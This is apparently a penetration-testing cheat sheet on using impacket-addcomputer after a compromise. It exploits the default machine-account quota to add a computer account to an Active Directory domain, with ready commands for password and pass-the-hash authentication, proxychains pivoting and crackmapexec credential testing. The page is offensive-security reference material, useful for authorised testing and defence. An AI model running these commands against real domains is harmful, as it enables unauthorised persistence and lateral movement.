Skip to main content

Impacket-Addcomputer

When to Use

Could be used post-compromise upon enumerating the ms-DS-MachineAccountQuota policy. If you use a tool such as ldapdomaindump  -- see here for more information --  it will write the domain policy to a file called, domain_policy.json.

"ms-DS-MachineAccountQuota": [
	10
]

If you find the default policy as shown above, this means even low-level domain users can join computers to the domain. Computer accounts have credentials just the same as users do. A computer's username ends with a $

Computer accounts may be added to privileged groups or misconfigured groups and inherit special permissions. After adding the computer account, you could pass the computer username and password around the network.



Usage Examples

Password Authentication

# Add a comptuer account 'supercomputer$' with a password of 'Super5ecret!'
impacket-addcomputer -dc-ip domain-controller-ip -computer-name supercomputer -computer-pass 'Super5ecret!' 'domain.tld/username:password'

# Post-compromise via proxy host
proxychains -q impacket-addcomputer -dc-ip domain-controller-ip -computer-name supercomputer -computer-pass 'Super5ecret!' 'domain.tld/username:password'


Pass the Hash

# Add a comptuer account 'supercomputer$' with a password of 'Super5ecret!'
# Use the hash belonging to domain.tld/username
impacket-addcomputer -dc-ip domain-controller-ip -computer-name supercomputer -computer-pass 'Super5ecret!' -hashes lm-hash:nt-hash 'domain.tld/username'

# Post-compromise via proxy host
proxychains -q impacket-addcomputer -dc-ip domain-controller-ip -computer-name supercomputer -computer-pass 'Super5ecret!' -hashes lm-hash:nt-hash 'domain.tld/username'



Pass the Password

# Test the computer credential using crackmapexec
crackmapexec smb CIDR/target-ip -u 'computername$' -p 'computerpass' -d domain.tld

# Via proxy host
proxychains -q crackmapexec smb CIDR/target-ip -u 'computername$' -p 'computerpass' -d domain.tld